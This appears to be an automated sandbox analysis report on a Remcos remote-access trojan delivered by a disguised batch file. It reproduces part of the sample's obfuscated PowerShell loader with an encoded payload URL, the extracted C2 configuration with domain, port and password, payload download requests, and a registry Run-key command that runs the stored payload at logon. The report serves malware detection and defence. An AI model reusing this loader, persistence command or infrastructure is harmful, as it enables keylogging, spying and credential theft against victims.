,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybe

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5544, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-18T12:40:00.628699+020020365941Malware Command and Control Activity Detected192.168.2.449742193.187.91.21653848TCP
                2024-10-18T12:40:02.972396+020020365941Malware Command and Control Activity Detected192.168.2.449743193.187.91.21653848TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-18T12:40:02.618419+020028033043Unknown Traffic192.168.2.449749178.237.33.5080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "Nbuild", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JTPTLW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
                Source: Yara matchFile source: 00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.2031771980.00000000070AC000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_254C10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 193.187.91.216:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 193.187.91.216:53848
                Source: Malware configuration extractorURLs: renajazinw.duckdns.org
                Source: unknownDNS query: name: renajazinw.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 193.187.91.216:53848
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49749 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /l/Squirtish.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /l/Squirtish.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /l/Squirtish.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /l/MhRliPwcjA146.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /l/MhRliPwcjA146.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /l/Squirtish.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /l/MhRliPwcjA146.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /l/MhRliPwcjA146.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000009.00000002.2971804625.0000000025D00000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000009.00000002.2971804625.0000000025D00000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: artieri.ro
                Source: global trafficDNS traffic detected: DNS query: renajazinw.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A084D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A23BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A2057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A23A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro
                Source: msiexec.exe, 00000009.00000002.2970535229.0000000024FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/l/MhRliPwcjA146.bin
                Source: msiexec.exe, 00000009.00000003.2213273303.00000000095A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/l/MhRliPwcjA146.bind
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A084D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/l/Squirtish.tocP
                Source: powershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/l/Squirtish.tocXR
                Source: msiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: msiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                Source: powershell.exe, 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A0621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2003377211.00000000044A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: msiexec.exe, 00000009.00000003.2172179148.00000000095BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2172331289.00000000095F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.&o
                Source: msiexec.exeString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A0621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2003377211.00000000044A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A23A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1819894131.00000299A0AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A0AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artieri.ro/l/Squirtish.toc
                Source: powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.2003377211.00000000045F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2031771980.0000000007027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1819894131.00000299A11E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2020592068.0000000005509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041183A OpenClipboard,GetLastError,14_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_3488.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B87BEB22_2_00007FFD9B87BEB2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B87B1062_2_00007FFD9B87B106
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B94A42A2_2_00007FFD9B94A42A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00A9EDF04_2_00A9EDF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00A9F6C04_2_00A9F6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00A9EAA84_2_00A9EAA8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254CB5C19_2_254CB5C1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254D71949_2_254D7194
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B04014_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043610D14_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044731014_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A49014_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040755A14_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043C56014_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B61014_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044D6C014_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004476F014_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B87014_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044081D14_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041495714_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004079EE14_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407AEB14_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044AA8014_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00412AA914_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404B7414_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404B0314_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044BBD814_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404BE514_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404C7614_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00415CFE14_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416D7214_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00446D3014_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00446D8B14_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406E8F14_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040503816_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041208C16_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004050A916_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040511A16_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043C13A16_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004051AB16_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044930016_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040D32216_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A4F016_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041363116_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044669016_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A73016_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004398D816_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004498E016_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A88616_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043DA0916_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00438D5E16_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00449ED016_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041FE8316_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00430F5416_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5874
                Source: unknownProcess created: Commandline size = 5898
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5874Jump to behavior
                Source: amsi32_3488.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/13@3/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,14_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,14_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,14_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,14_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Categorizes.AfgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzanuggo.thd.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKM_0001810-01-2024-GL-3762.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1188
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3488
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000009.00000002.2971804625.0000000025D00000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
